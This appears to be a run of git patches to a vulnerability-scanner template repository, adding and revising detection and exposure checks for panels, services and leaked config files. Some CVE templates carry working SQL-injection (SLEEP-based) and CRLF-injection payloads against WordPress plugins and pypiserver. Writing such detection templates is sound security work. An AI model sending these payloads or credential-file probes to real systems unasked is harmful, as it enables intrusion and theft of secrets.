cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | +| tech | 357 | princechaddha | 153 | file | 78 | | | | | From 6330e4f4732f5fc712b1a3ce9de2cfba45e8ce4b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 15:14:44 +0000 Subject: [PATCH 0931/1415] Auto README Update [Sun Dec 4 15:14:44 UTC 2022] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index c21735b51c..bfd9c83aa8 100644 --- a/README.md +++ b/README.md @@ -42,16 +42,16 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 | -| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 | -| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 | -| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 | -| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | | -| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | | -| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | | -| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | -| tech | 349 | princechaddha | 153 | file | 78 | | | | | +| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | +| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | +| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | +| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | | +| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | | +| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | +| tech | 357 | princechaddha | 153 | file | 78 | | | | | **321 directories, 4733 files**. From 4a88b7c420cc69d46306f0493a30bf56f61bc62c Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Sun, 4 Dec 2022 16:51:21 +0000 Subject: [PATCH 0932/1415] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 1ff6ed782a..2d7fa5d6d2 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -2,13 +2,14 @@ id: error-logs info: name: common error log files - author: geeknik,daffainfo,ELSFA7110 + author: geeknik,daffainfo,ELSFA7110,Hardik-Solanki severity: low tags: logs,exposure,error requests: - method: GET path: + - "{{BaseURL}}/php_errors.log" - "{{BaseURL}}/MyErrors.log" - "{{BaseURL}}/admin/error.log" - "{{BaseURL}}/admin/errors.log" From 8f4fbea711c44b06ae24fb4aa6efdd7a65705775 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 00:24:30 +0530 Subject: [PATCH 0933/1415] Create gradle-libs.yaml --- exposures/files/gradle-libs.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/files/gradle-libs.yaml diff --git a/exposures/files/gradle-libs.yaml b/exposures/files/gradle-libs.yaml new file mode 100644 index 0000000000..5cd6243e8f --- /dev/null +++ b/exposures/files/gradle-libs.yaml @@ -0,0 +1,31 @@ +id: gradle-libs + +info: + name: Gradle libs.versions.toml Disclosure + author: DhiyaneshDK + severity: low + metadata: + verified: true + github-query: filename:libs.versions.toml + tags: file,gradle + +requests: + - method: GET + path: + - '{{BaseURL}}/gradle/libs.versions.toml' + - '{{BaseURL}}/libs.versions.toml' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "[versions]" + - "[libraries]" + - "[bundles]" + condition: and + + - type: status + status: + - 200 From bb4f42796f3da68db25e7680790b3695cc300518 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Dec 2022 11:31:29 +0530 Subject: [PATCH 0934/1415] Update CVE-2022-0826.yaml --- cves/2022/CVE-2022-0826.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml index 15f724ac96..5a0f8b52c0 100644 --- a/cves/2022/CVE-2022-0826.yaml +++ b/cves/2022/CVE-2022-0826.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2022-0826 cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-video-gallery-free,unauth requests: - raw: @@ -28,11 +28,12 @@ requests: Content-Type: application/x-www-form-urlencoded action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 + matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - - '(contains(body, "Registred videos :") || contains(body, "duplicate"))' - condition: and \ No newline at end of file + - 'contains(body, "Registred videos :")' + condition: and From e444caba63df219787115ca14ca2d9042799fd29 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 11:59:42 +0530 Subject: [PATCH 0935/1415] Create finger-detect.yaml --- network/detection/finger-detect.yaml | 29 ++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/detection/finger-detect.yaml diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml new file mode 100644 index 0000000000..3216d42d83 --- /dev/null +++ b/network/detection/finger-detect.yaml @@ -0,0 +1,29 @@ +id: finger-detect + +info: + name: Finger Daemon Detection + author: DhiyaneshDK + severity: info + description: | + The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. + metadata: + verified: true + shodan-query: port:"79" action + tags: network,finger + +network: + - inputs: + - data: "\n" + + host: + - "{{Hostname}}" + - "{{Host}}:79" + + matchers: + - type: word + part: body + words: + - "User" + - "Action" + - "Node" + condition: and From 976dde4a7ff53fa404b5ae755fd601bf47147b0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 13:12:28 +0530 Subject: [PATCH 0936/1415] Create rpcbind-portmapper-detect.yaml --- .../detection/rpcbind-portmapper-detect.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 network/detection/rpcbind-portmapper-detect.yaml diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml new file mode 100644 index 0000000000..a8a6be522e --- /dev/null +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -0,0 +1,22 @@ +id: rpcbind-portmapper-detect + +info: + name: RPCBind Portmapper Detection + author: geeknik + severity: info + reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind + tags: network,rpcbind,portmap + +network: + - inputs: + - data: 8000002836ed646d0000000000000002000186a0000000040000000400000000000000000000000000000000 + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:111" + + matchers: + - type: word + words: + - "/run/rpcbind.sock" From c7084c9f6dbb8da81d762032caf40c6a289cf332 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Dec 2022 14:33:06 +0530 Subject: [PATCH 0937/1415] Update pega-web-panel.yaml --- exposed-panels/pega-web-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index 8a34f22be9..d6458abe6c 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -17,8 +17,8 @@ info: requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/prweb/PRAuth/app/default/" - - "{{BaseURL}}/prweb" host-redirects: true max-redirects: 2 From a973a916d60f3f6d1a15f011c359875202ad1899 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 15:43:30 +0530 Subject: [PATCH 0938/1415] Create config-json.yaml --- exposures/configs/config-json.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/configs/config-json.yaml diff --git a/exposures/configs/config-json.yaml b/exposures/configs/config-json.yaml new file mode 100644 index 0000000000..7c28d4c2ed --- /dev/null +++ b/exposures/configs/config-json.yaml @@ -0,0 +1,32 @@ +id: config-json + +info: + name: Config File Exposure + author: geeknik + severity: high + metadata: + verified: true + github-query: filename:config.json + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/config/default.json" + - "{{BaseURL}}/config.json" + - "{{BaseURL}}/config/config.json" + - "{{BaseURL}}/credentials/config.json" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '"api_keys":' + - '"accessKey":' + - '"secretKey":' + condition: or + + - type: status + status: + - 200 From 2fb6ca231f152063c2df85073201d9618bd08774 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Dec 2022 17:23:26 +0530 Subject: [PATCH 0939/1415] Update CVE-2022-0948.yaml --- cves/2022/CVE-2022-0948.yaml | 25 +++++++++++-------------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml index a5199a57ff..cbc5707004 100644 --- a/cves/2022/CVE-2022-0948.yaml +++ b/cves/2022/CVE-2022-0948.yaml @@ -11,20 +11,13 @@ info: - https://wordpress.org/plugins/woc-order-alert/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-0948 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woc-order-alert,unauth requests: - raw: - - | - GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 - Host: {{Hostname}} - - | @timeout: 15s POST /?rest_route=/olistener/new HTTP/1.1 @@ -33,12 +26,16 @@ requests: {"id":" (SLEEP(6))#"} + - | + GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 + Host: {{Hostname}} + req-condition: true matchers: - type: dsl dsl: - - 'duration_2>=6' - - 'status_code_2 == 200' - - 'contains(content_type_2, "application/json")' - - 'contains(body_1, "olistener-action.olistener-controller")' - condition: and \ No newline at end of file + - 'duration_1>=6' + - 'status_code_1 == 200' + - 'contains(content_type_1, "application/json")' + - 'contains(body_2, "olistener-action.olistener-controller")' + condition: and From 90e04901e8924a9fc54ade2f0486d49409ce9348 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 17:30:14 +0530 Subject: [PATCH 0940/1415] Update elasticsearch.yaml --- misconfiguration/elasticsearch.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/elasticsearch.yaml b/misconfiguration/elasticsearch.yaml index 32aaf22f15..3da231754e 100644 --- a/misconfiguration/elasticsearch.yaml +++ b/misconfiguration/elasticsearch.yaml @@ -2,8 +2,11 @@ id: elasticsearch info: name: ElasticSearch Information Disclosure - author: Shine,c-sh0 + author: Shine,c-sh0,geeknik severity: low + metadata: + verified: true + shodan-query: "ElasticSearch" tags: elastic,unauth,elasticsearch requests: @@ -12,6 +15,7 @@ requests: - '{{BaseURL}}/?pretty' - '{{BaseURL}}/_cat/indices?v' - '{{BaseURL}}/_all/_search' + - "{{BaseURL}}/_cluster/health?pretty" stop-at-first-match: true matchers-condition: and @@ -20,6 +24,7 @@ requests: words: - '"took":' - '"number" :' + - '"number_of_nodes" :' condition: or - type: status From 7192933fc59517af31f9ef0f07353f16fb0c2686 Mon Sep 17 00:00:00 2001 From: Aman Rawat <rawataman6525@gmail.com> Date: Mon, 5 Dec 2022 19:31:47 +0530 Subject: [PATCH 0941/1415] Created template MetaView Explorer Installer --- .../metaview-explorer-installer.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/metaview-explorer-installer.yaml diff --git a/exposed-panels/metaview-explorer-installer.yaml b/exposed-panels/metaview-explorer-installer.yaml new file mode 100644 index 0000000000..197b2f31cf --- /dev/null +++ b/exposed-panels/metaview-explorer-installer.yaml @@ -0,0 +1,28 @@ +id: metaview-explorer-installer + +info: + name: MetaView Explorer (InstallAnywhere Web Installer) + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"MetaView Explorer" + tags: metaview-explorer, installer + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>MetaView Explorer' + - '(InstallAnywhere Web Installer)' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 49c7157726679564a5493e76aff5dcee62ebbc6b Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 5 Dec 2022 20:02:34 +0530 Subject: [PATCH 0942/1415] Created template mag-dashboard-login --- exposed-panels/mag-dashboard-login.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/mag-dashboard-login.yaml diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-login.yaml new file mode 100644 index 0000000000..7d137b91e6 --- /dev/null +++ b/exposed-panels/mag-dashboard-login.yaml @@ -0,0 +1,29 @@ +id: mag-dashboard-login + +info: + name: MAG Dashboard Login + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"MAG Dashboard Login" + tags: mag-dashboard, login + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/mag/' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'MAG Dashboard Login' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 4faa5eb09cc2b2d1a4b06c235acb55cd8d8d4655 Mon Sep 17 00:00:00 2001 From: Aman Rawat <rawataman6525@gmail.com> Date: Mon, 5 Dec 2022 20:04:03 +0530 Subject: [PATCH 0943/1415] Created template netris-dashboard-login --- exposed-panels/netris-dashboard-login.yaml | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/netris-dashboard-login.yaml diff --git a/exposed-panels/netris-dashboard-login.yaml b/exposed-panels/netris-dashboard-login.yaml new file mode 100644 index 0000000000..869b823b08 --- /dev/null +++ b/exposed-panels/netris-dashboard-login.yaml @@ -0,0 +1,29 @@ +id: netris-dashboard-login + +info: + name: Netris Dashboard + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Netris Dashboard" + tags: netris-dashboard, login + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Netris Dashboard' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 59194f44195d042e1866881874fc5bf6cc8f8d4a Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 5 Dec 2022 20:05:29 +0530 Subject: [PATCH 0944/1415] Created template aircube-dashboard-login --- exposed-panels/aircube-dashboard-login.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/aircube-dashboard-login.yaml diff --git a/exposed-panels/aircube-dashboard-login.yaml b/exposed-panels/aircube-dashboard-login.yaml new file mode 100644 index 0000000000..06fece3136 --- /dev/null +++ b/exposed-panels/aircube-dashboard-login.yaml @@ -0,0 +1,29 @@ +id: aircube-dashboard-login + +info: + name: Netris Dashboard + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"AirCube Dashboard" + tags: aircube-dashboard, login + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/#/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'AirCube Dashboard' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From bf97fd1f5944412416a4fdf0d6a84b9c732765e2 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 5 Dec 2022 20:08:45 +0530 Subject: [PATCH 0945/1415] Updated --- exposed-panels/aircube-dashboard-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/aircube-dashboard-login.yaml b/exposed-panels/aircube-dashboard-login.yaml index 06fece3136..613f96fcc5 100644 --- a/exposed-panels/aircube-dashboard-login.yaml +++ b/exposed-panels/aircube-dashboard-login.yaml @@ -1,7 +1,7 @@ id: aircube-dashboard-login info: - name: Netris Dashboard + name: AirCube Dashboard author: theamanrawat severity: info metadata: From 8c4e9c1d1d356c7db6cfd888b70456e64b288957 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:32:39 +0530 Subject: [PATCH 0946/1415] Update and rename exposed-panels/metaview-explorer-installer.yaml to misconfiguration/installer/metaview-explorer-installer.yaml --- .../installer}/metaview-explorer-installer.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename {exposed-panels => misconfiguration/installer}/metaview-explorer-installer.yaml (64%) diff --git a/exposed-panels/metaview-explorer-installer.yaml b/misconfiguration/installer/metaview-explorer-installer.yaml similarity index 64% rename from exposed-panels/metaview-explorer-installer.yaml rename to misconfiguration/installer/metaview-explorer-installer.yaml index 197b2f31cf..3bc3636a64 100644 --- a/exposed-panels/metaview-explorer-installer.yaml +++ b/misconfiguration/installer/metaview-explorer-installer.yaml @@ -1,13 +1,13 @@ id: metaview-explorer-installer info: - name: MetaView Explorer (InstallAnywhere Web Installer) + name: MetaView Explorer Installer author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"MetaView Explorer" - tags: metaview-explorer, installer + tags: metaview,installer requests: - method: GET @@ -19,10 +19,10 @@ requests: - type: word part: body words: - - 'MetaView Explorer' - - '(InstallAnywhere Web Installer)' + - 'MetaView Explorer' + - '(InstallAnywhere Web Installer)' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From f4f850127dfbc6faa8f3146e104b1023f2d36911 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:33:02 +0530 Subject: [PATCH 0947/1415] Update metaview-explorer-installer.yaml --- misconfiguration/installer/metaview-explorer-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/installer/metaview-explorer-installer.yaml b/misconfiguration/installer/metaview-explorer-installer.yaml index 3bc3636a64..c3b302b70a 100644 --- a/misconfiguration/installer/metaview-explorer-installer.yaml +++ b/misconfiguration/installer/metaview-explorer-installer.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"MetaView Explorer" - tags: metaview,installer + tags: metaview,installer,misconfig requests: - method: GET From 1cc6bc9e8bfb58c9656d4c2748382391d6d9cece Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:39:57 +0530 Subject: [PATCH 0948/1415] Update mag-dashboard-login.yaml --- exposed-panels/mag-dashboard-login.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-login.yaml index 7d137b91e6..90c662d403 100644 --- a/exposed-panels/mag-dashboard-login.yaml +++ b/exposed-panels/mag-dashboard-login.yaml @@ -7,23 +7,24 @@ info: metadata: verified: true shodan-query: http.title:"MAG Dashboard Login" - tags: mag-dashboard, login + tags: panel,mag requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/mag/' - stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - 'MAG Dashboard Login' + - 'MAG Dashboard Login' + - 'Check for Renewal License' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From e02be7528a8b24e2bc545938ddcc0f6ad8ac7d5d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 22:49:04 +0530 Subject: [PATCH 0949/1415] Update and rename netris-dashboard-login.yaml to netris-dashboard-panel.yaml --- ...ard-login.yaml => netris-dashboard-panel.yaml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename exposed-panels/{netris-dashboard-login.yaml => netris-dashboard-panel.yaml} (62%) diff --git a/exposed-panels/netris-dashboard-login.yaml b/exposed-panels/netris-dashboard-panel.yaml similarity index 62% rename from exposed-panels/netris-dashboard-login.yaml rename to exposed-panels/netris-dashboard-panel.yaml index 869b823b08..5d501c8304 100644 --- a/exposed-panels/netris-dashboard-login.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -1,29 +1,30 @@ -id: netris-dashboard-login +id: netris-dashboard-panel info: - name: Netris Dashboard + name: Netris Dashboard Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"Netris Dashboard" - tags: netris-dashboard, login + tags: panel,netris requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/login' - stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - - '<title>Netris Dashboard' + - 'Netris Dashboard' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From f267553f8d86e01a5b76af72c6d23c6188897a9d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:49:21 +0530 Subject: [PATCH 0950/1415] Update netris-dashboard-panel.yaml --- exposed-panels/netris-dashboard-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/netris-dashboard-panel.yaml b/exposed-panels/netris-dashboard-panel.yaml index 5d501c8304..a6c1277976 100644 --- a/exposed-panels/netris-dashboard-panel.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -23,7 +23,6 @@ requests: part: body words: - 'Netris Dashboard' - condition: and - type: status status: From 71ccb4d8cb8714039e0e19e23a2026ca22eabda9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:54:03 +0530 Subject: [PATCH 0951/1415] Update and rename aircube-dashboard-login.yaml to aircube-dashboard-panel --- ...dashboard-login.yaml => aircube-dashboard-panel} | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) rename exposed-panels/{aircube-dashboard-login.yaml => aircube-dashboard-panel} (57%) diff --git a/exposed-panels/aircube-dashboard-login.yaml b/exposed-panels/aircube-dashboard-panel similarity index 57% rename from exposed-panels/aircube-dashboard-login.yaml rename to exposed-panels/aircube-dashboard-panel index 613f96fcc5..500db3ae8b 100644 --- a/exposed-panels/aircube-dashboard-login.yaml +++ b/exposed-panels/aircube-dashboard-panel @@ -1,29 +1,26 @@ -id: aircube-dashboard-login +id: aircube-dashboard-panel info: - name: AirCube Dashboard + name: AirCube Dashboard Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"AirCube Dashboard" - tags: aircube-dashboard, login + tags: panel,aircube requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/#/login' - stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'AirCube Dashboard' - condition: and + - 'AirCube Dashboard' - type: status status: - - 200 \ No newline at end of file + - 200 From 39c69cc7531e2efab44d7250101c9f2d685f7b4f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 6 Dec 2022 00:11:19 +0530 Subject: [PATCH 0952/1415] Add files via upload --- network/detection/redis-detect.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 network/detection/redis-detect.yaml diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml new file mode 100644 index 0000000000..72073fa44a --- /dev/null +++ b/network/detection/redis-detect.yaml @@ -0,0 +1,27 @@ +id: redis-detect + +info: + name: Redis Detection + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: product:"redis" + tags: network,redis,unauth + +network: + - inputs: + - data: "*1\r\n$4\r\ninfo\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:6379" + read-size: 1024 + + matchers: + - type: word + words: + - "DENIED Redis" + - "CONFIG REWRITE" + - "NOAUTH Authentication" + condition: or From 16372e3ed0810c9c6fee2075d7fae66cc17c78fe Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 6 Dec 2022 00:14:56 +0530 Subject: [PATCH 0953/1415] Update redis-detect.yaml --- network/detection/redis-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 72073fa44a..ac536804b3 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: product:"redis" - tags: network,redis,unauth + tags: network,redis network: - inputs: @@ -24,4 +24,4 @@ network: - "DENIED Redis" - "CONFIG REWRITE" - "NOAUTH Authentication" - condition: or + condition: or From 04a9e65113b47f2f6dc1e6f053065d9ca54537a1 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 6 Dec 2022 08:32:40 +0900 Subject: [PATCH 0954/1415] Create CVE-2019-6802.yaml --- CVE-2019-6802.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 CVE-2019-6802.yaml diff --git a/CVE-2019-6802.yaml b/CVE-2019-6802.yaml new file mode 100644 index 0000000000..a9848720e7 --- /dev/null +++ b/CVE-2019-6802.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-6802 + +info: + name: CRLF Injection in pypiserver 1.2.5 + author: 0x_Akoko + severity: medium + description: CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI + reference: + - https://vuldb.com/?id.130257 + - https://www.cvedetails.com/cve/CVE-2019-6802/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-6802 + cwe-id: CWE-93 + tags: cve,cve2019,crlf,generic,pypiserver + +requests: + - method: GET + path: + - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' From 90573b8d3e226597297f7f45e080b57041f8b573 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 22:47:19 -0500 Subject: [PATCH 0955/1415] Update meteor-takeover.yaml - matching id with file name. --- takeovers/meteor-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/meteor-takeover.yaml b/takeovers/meteor-takeover.yaml index 5f594c0471..d05097abe6 100644 --- a/takeovers/meteor-takeover.yaml +++ b/takeovers/meteor-takeover.yaml @@ -1,4 +1,4 @@ -id: rivalsec-meteor-takeover +id: meteor-takeover info: name: Meteor subdomain takeover From e569c1467e31f96af399ce3661c1ffd50d375058 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Dec 2022 04:18:34 +0000 Subject: [PATCH 0957/1415] Auto Generated CVE annotations [Tue Dec 6 04:18:34 UTC 2022] :robot: --- cves/2019/CVE-2019-3911.yaml | 2 +- cves/2019/CVE-2019-3912.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-3911.yaml b/cves/2019/CVE-2019-3911.yaml index 4a49beede1..debfaab3d3 100644 --- a/cves/2019/CVE-2019-3911.yaml +++ b/cves/2019/CVE-2019-3911.yaml @@ -9,7 +9,7 @@ info: - https://www.tenable.com/security/research/tra-2019-03 - https://nvd.nist.gov/vuln/detail/CVE-2019-3911 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3911 cwe-id: CWE-79 diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index c8e7f22c1b..080ab85add 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -10,7 +10,7 @@ info: - https://www.cvedetails.com/cve/CVE-2019-3912 - 